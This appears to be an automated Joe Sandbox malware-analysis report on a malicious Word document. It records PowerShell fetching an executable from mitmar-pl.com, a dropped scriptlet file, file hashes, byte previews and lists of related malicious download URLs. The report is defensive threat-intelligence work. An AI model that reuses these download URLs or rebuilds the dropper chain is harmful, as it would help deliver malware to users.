                                https://stackoverflow.com/q/14436606/23354okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netJokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                    		high
                                    httP://mitmar-pl.com/okcff.expowershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                      		high
                                      http://mitmar-pl.com/Crkrqdrd.jpegiokcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.hotmail.com/oenotepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                                        		high
                                        httP://mitmar-pl.com/okcff.exepowershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://google.com/okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                          		high
                                          https://google.comDokcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpfalse
                                            		high
                                            httP://mitmar-pl.com/okcff.exePEpowershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://github.com/mgravell/protobuf-netiokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                              		high
                                              http://mitmar-pl.compowershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://stackoverflow.com/q/11564914/23354;okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                                		high
                                                https://stackoverflow.com/q/2152978/23354okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                                  		high
                                                  http://investor.msn.com/notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://www.%s.comPApowershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		low
                                                    httP://mitmar-pl.com/okpowershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpfalse
                                                      		high
                                                      https://google.comokcff.exefalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameokcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          37.0.9.166
                                                          		mitmar-pl.comNetherlands
                                                          		198301WKD-ASIEtrue

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:553100
                                                          Start date:14.01.2022
                                                          Start time:10:22:19
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 37s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:478644.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Number of analysed new started processes analysed:43
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.expl.evad.winDOC@53/21@4/1
                                                          EGA Information:
                                                          • Successful, ratio: 25%
                                                          HDC Information:
                                                          • Successful, ratio: 0.9% (good quality ratio 0.8%)
                                                          • Quality average: 64.2%
                                                          • Quality standard deviation: 30.7%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 280
                                                          • Number of non-executed functions: 12
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .doc
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Active ActiveX Object
                                                          • Scroll down
                                                          • Close Viewer
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                          • Execution Graph export aborted for target okcff.exe, PID 2176 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 2904 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          10:22:29API Interceptor95x Sleep call for process: powershell.exe modified
                                                          10:22:35API Interceptor722x Sleep call for process: okcff.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          37.0.9.166RFQ7534567.docGet hashmaliciousBrowse
                                                          • mitmar-pl.com/okcth.exe
                                                          facturas pagadas.docGet hashmaliciousBrowse
                                                          • denclova-com.sbs/ebuz/evan.exe
                                                          NEW QUOTATION.docGet hashmaliciousBrowse
                                                          • denclova-com.sbs/ab/sach.exe
                                                          SKM000879 PAYMENT COPY 12 1 2021.docGet hashmaliciousBrowse
                                                          • denclova-com.sbs/sm/smt.exe
                                                          64795.docGet hashmaliciousBrowse
                                                          • mitmar-pl.com/nnaw.exe
                                                          Request876567.docGet hashmaliciousBrowse
                                                          • mitmar-pl.com/okc.exe
                                                          REQUEST987645.docGet hashmaliciousBrowse
                                                          • mitmar-pl.com/nnn.exe
                                                          8456754.docGet hashmaliciousBrowse
                                                          • mitmar-pl.com/okcc.exe
                                                          RFQ56767.docGet hashmaliciousBrowse
                                                          • mitmar-pl.com/nnat.exe
                                                          facturas pagadas.docGet hashmaliciousBrowse
                                                          • archbal.sbs/ewa/aza.exe
                                                          documentos Fedex00345.docGet hashmaliciousBrowse
                                                          • archbal.sbs/ewa/tew.exe
                                                          Cotizaci#U00f3n.docGet hashmaliciousBrowse
                                                          • archbal.sbs/ebraznmsd/emex.exe
                                                          Arca statement for Outstanding payments .docGet hashmaliciousBrowse
                                                          • archbal.sbs/semx/sem.exe
                                                          New Order064.docGet hashmaliciousBrowse
                                                          • archbal.sbs/benxve/abenm.exe
                                                          cat#U00e1logo de nuevos productos con la mejor oferta.docGet hashmaliciousBrowse
                                                          • archbal.sbs/ebraznmsd/enebz.exe
                                                          W556263747ONBGRT.docGet hashmaliciousBrowse
                                                          • archbal.sbs/merb/meb.exe
                                                          Consulta de pedido PO-947-LSD-094753.docGet hashmaliciousBrowse
                                                          • archbal.sbs/donlaz11/bdal.exe
                                                          Proof of payment for overdue invoice.docGet hashmaliciousBrowse
                                                          • archbal.sbs/nedxh11/nweds.exe
                                                          NEW QUOTATION.docGet hashmaliciousBrowse
                                                          • archbal.sbs/abnop/ab.exe
                                                          Order DM8 6700356.docGet hashmaliciousBrowse
                                                          • archbal.sbs/obnesx/ob.exe

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          mitmar-pl.comRFQ7534567.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          64795.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          Request876567.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          REQUEST987645.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          8456754.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          RFQ56767.docGet hashmaliciousBrowse
                                                          • 37.0.9.166

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          WKD-ASIERFQ7534567.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          facturas pagadas.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          NEW QUOTATION.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          SKM000879 PAYMENT COPY 12 1 2021.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          64795.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          Request876567.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          REQUEST987645.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          8456754.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          RFQ56767.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          facturas pagadas.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          767C546DECF6F669263E4A0A87A0F5D92234E031E9A0D.exeGet hashmaliciousBrowse
                                                          • 37.0.10.214
                                                          documentos Fedex00345.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          03430361A6D2FE6C89D6B237CA9B887CC6269187B305A.exeGet hashmaliciousBrowse
                                                          • 37.0.10.214
                                                          Cotizaci#U00f3n.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          Arca statement for Outstanding payments .docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          New Order064.docGet hashmaliciousBrowse
                                                          • 37.0.9.166
                                                          PwUs4oWFJT.exeGet hashmaliciousBrowse
                                                          • 37.0.10.199
                                                          SDGU7w7WFN.exeGet hashmaliciousBrowse
                                                          • 37.0.10.199
                                                          wD9I6UVdtv.exeGet hashmaliciousBrowse
                                                          • 37.0.10.199
                                                          HyfcliVIXs.exeGet hashmaliciousBrowse
                                                          • 37.0.10.199

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          IE Cache URL:http://mitmar-pl.com/okcff.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y................0..T..........Ns... ........@.. .......................@............@..................................s..K.......X.................... ....................................................... ............... ..H............text...TS... ...T.................. ..`.rsrc...X............V..............@..@.reloc....... ......................@..B................0s......H........B.../..........Hr...............................................0...........r...p(....(.....(......(.....*..0..Q....... ......$.8......$.E........................S...............c...........^...........7...>...2...................(...................[...........m...8.....8M... ....~_...:....& ....8......(.E........q.......^...8............io....8......./(....:8... ....8......,.....(....(.....* ....~h...9....& ....8...../(....t......8....(.....*(...... ....~....9]...&
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570DA74A.wmf
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                                          Category:dropped
                                                          Size (bytes):3712
                                                          Entropy (8bit):5.036435545575714
                                                          Encrypted:false
                                                          SSDEEP:96:Gk7Hgwj+mbYf3LSrhlOs0f5aSdHn63Dx3:Gk7Awam8fI4s0f5ap3
                                                          MD5:F238B72FF240B9EA28769FFFB0C11843
                                                          SHA1:54EDB9197B4A4C9C3CFFF894A83174DD17DDA9D2
                                                          SHA-256:A37AE38F17314E0B3C0967F597285E9EC9CA175B6DC223ECF76BC6CE79586E05
                                                          SHA-512:4AA9A9EF5432C866F996679D58358CC02DF2CF07346AA030E643EB70258957058EBE10E0EF7CA7E6B41DECE1C99539B738864A24D9DD118E60206263C17620DB
                                                          Malicious:false
                                                          Preview: ......@.....!.....................5...........................Segoe UI....C.-.....@..........R....-...........................A..... . ..... . ...:.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...:.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CE2D32D.png
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:370 sysV pure executable
                                                          Category:dropped
                                                          Size (bytes):262160
                                                          Entropy (8bit):0.05136362991589137
                                                          Encrypted:false
                                                          SSDEEP:48:YpVMBmYIjDBgdEJdOcfd/Xdd/u9N7zGkqfoQ6eI:Yp/zb+HGffFE
                                                          MD5:A8A92E1C3D97E40596840C5045F94F67
                                                          SHA1:B2B4FB6D579C92F649582F63CC89D7B190AD8025
                                                          SHA-256:2C26843633ABB38F10B1D93AF2D96AC746C7C060EF69E06B113707F3F7FE8E74
                                                          SHA-512:048BAC628842FFEB7A9D218F3E680D38267A3FADA8DFED6DE1C60FA4F7D3BF7B8FA2681D0393D6A7520AE1F594E9649B470550B4344082B3FCDA62AF6A82E112
                                                          Malicious:false
                                                          Preview: X.........E.....W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.b.e.m.;.C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\...P.A.T.H.E.X.T.=...C.O.M.;...E.X.E.;...B.A.T.;...C.M.D.;...V.B.S.;...V.B.E.;...J.S.;...J.S.E.;...W.S.F.;...W.S.H.;...M.S.C...P.R.O.C.E.S.S.O.R._.A.R.C.H.I.T.E.C.T.U.R.E.=.A.M.D.6.4...P.R.O.C.E.S.S.O.R._.I.D.E.N.T.I.F.I.E.R.=.I.n.t.e.l.6.4. .F.a.m.i.l.y. .6. .M.o.d.e.l. .8.5. .S.t.e.p.p.i.n.g. .7.,. .G.e.n.u.i.n.e.I.n.t.e.l...P.R.O.C.E.S.S.O.R._.L.E.V.E.L.=.6...P.R.O.C.E.S.S.O.R._.R.E.V.I.S.I.O.N.=.5.5.0.7...P.r.o.g.r.a.m.D.a.t.a.=.C.:.\.P.r.o.g.r.a.m.D.a.t.a...P.r.o.g.r.a.m.F.i.l.e.s.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s...P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...P.r.o.g.r.a.m.W.6.4.3.2.=.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s...P.S.M.o.d.u.l.e.P.a.t.h.=.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.M.o.d.u.l.e.s.\.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.u.t.o.I.
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):212992
                                                          Entropy (8bit):4.7464056683239715
                                                          Encrypted:false
                                                          SSDEEP:3072:QbzakaBa9aRaOa2TF7sbzakaBa9aRaOa2TF7:KzakaBa9aRaOa2TozakaBa9aRaOa2T
                                                          MD5:D7EF29F80097BDF434F81F076289F2D4
                                                          SHA1:231DCAD0641F6DDF6D28A89D9AAF4102B261E693
                                                          SHA-256:8451756E2D56C1A430FCABA7DB51CF20ADEA6B83DB858E18AF6ABE4441238EA9
                                                          SHA-512:0454576AB79FAC0588046D19ACD5C562B7295C34C98C579E62D3667AADF72F6A31A5C68EFA736DBCDEE0A1F5FC30468CDFD5A6A25C00900FB22D7AF7D6D36DD2
                                                          Malicious:false
                                                          Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FAE5255-02F9-464D-A70F-CC3F2B77B94E}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3573187972516119
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1Mzl/n
                                                          MD5:21C2AF2BB9957FFECAD589E76FF8BA89
                                                          SHA1:08DDE72BB9349A555263E85CCDC477DB202E85FE
                                                          SHA-256:79586CFF1216985B54C69EC7D60FEB94DE375C824B633C32151F883FC4822991
                                                          SHA-512:CADC111BE5DA804F427AB8B4CF9652F09223A9BD2B220376D1E88CCD78A37A159C6B79A2DEF38E5D0D0B25D7402FA5B1721CEFECF35C6EF51DA46290A2C06D1F
                                                          Malicious:false
                                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5349C035-C6A0-4C16-B632-E1A36FB414FC}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C959E4C-92E1-4241-AA94-1568DABC6F24}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44016
                                                          Entropy (8bit):2.8832027230024
                                                          Encrypted:false
                                                          SSDEEP:768:IT/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:AFia0Dqeb0nstw29rVzWSgm58F
                                                          MD5:D320E2636A4FE368F1DD1721A88C0B72
                                                          SHA1:6DE8E522B7C191677F9A8668BFF895F3E7E0FB64
                                                          SHA-256:C73D18662DFD69AABA06F46A599560EC230124395B678230C4F0F8DFE83CA475
                                                          SHA-512:9B27E59DE735F81C7766AC2439057D6433D424C7CFF333274DE3736CCEA492BCFF08A6D0D3183E480CCB78040993DC00A174E3D5C444E63AD1E9FDEA28D501EB
                                                          Malicious:false
                                                          Preview: c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.p.~...S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.8.7.e.9.4.e.f.e.c.e.9.7.0.2.e.d.4.1.f.4.5.9.e.b.e.d.9.e.f.e.2.5.8.9.5.0.4.e.4.7.0.......................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .ja.e...CJ..OJ..QJ..U..^J..aJ.
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):96978
                                                          Entropy (8bit):4.476034550957548
                                                          Encrypted:false
                                                          SSDEEP:768:+abzakaBa9aRaOa2O2jOLWRoNVYwUn7ZwPW1DGJ:+abzakaBa9aRaOa2TENa7A
                                                          MD5:30DD770655427043A65B4CA45F7443C6
                                                          SHA1:3BBC7640A0D21F941D342532405FE6B62BC1C423
                                                          SHA-256:C48F7949E36EA00828F752C9A5A2BAA48FA6F867BA9013025B6D6CB858F31768
                                                          SHA-512:188F28CC8E3FB2C14F34360BDD0CD137B17162DA59017A9C42E9559837ECBE56BE290A93B715E3F2F3F1CF7CC28343CDC497E6EA0303275530D450C3204B63BE
                                                          Malicious:true
                                                          Preview: .............................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:gAWY3n:qY3n
                                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                          Malicious:false
                                                          Preview: [ZoneTransfer]..ZoneId=3..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\478644.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Jan 14 17:22:23 2022, length=392070, window=hide
                                                          Category:dropped
                                                          Size (bytes):992
                                                          Entropy (8bit):4.516683865071603
                                                          Encrypted:false
                                                          SSDEEP:12:8Cr1I0gXg/XAlCPCHaXjByB/AVtX+WLUyVNicvbMK5DtZ3YilMMEpxRljKPtt6Tg:8nk/XTTc+bRUM0ef5Dv3qwtiR7m
                                                          MD5:0F74FC3AD8670059320D5A7767BB0A3E
                                                          SHA1:6305BC2235CB1924EAB45008C8B4FD0BB9B6CFF9
                                                          SHA-256:132354D2946AB264EFA224DF2AE58E9BA7FB67122F3672BC8F6A564CBF8C609A
                                                          SHA-512:207815791EB8572911BF33A0E4B5E2AE24A53D8514210F170BBF345D57847D4A4BEA7924B2ABFE92A76631763A0D1A34EE980A29A9ADEA4B14B3484F16D66B89
                                                          Malicious:false
                                                          Preview: L..................F.... ....y>....y>....^.s................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2......T. .478644.doc..B.......S...S..*.........................4.7.8.6.4.4...d.o.c.......t...............-...8...[............?J......C:\Users\..#...................\\506013\Users.user\Desktop\478644.doc.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.7.8.6.4.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......506013..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):63
                                                          Entropy (8bit):4.548497884319839
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlSLjomX1RuT3Ljov:bCLjC7jy
                                                          MD5:0BF65FC4D2E1FE20737B46427E7DB0D2
                                                          SHA1:F210ABEDA65F65C2DE79F07D3049C4C5DB489CF6
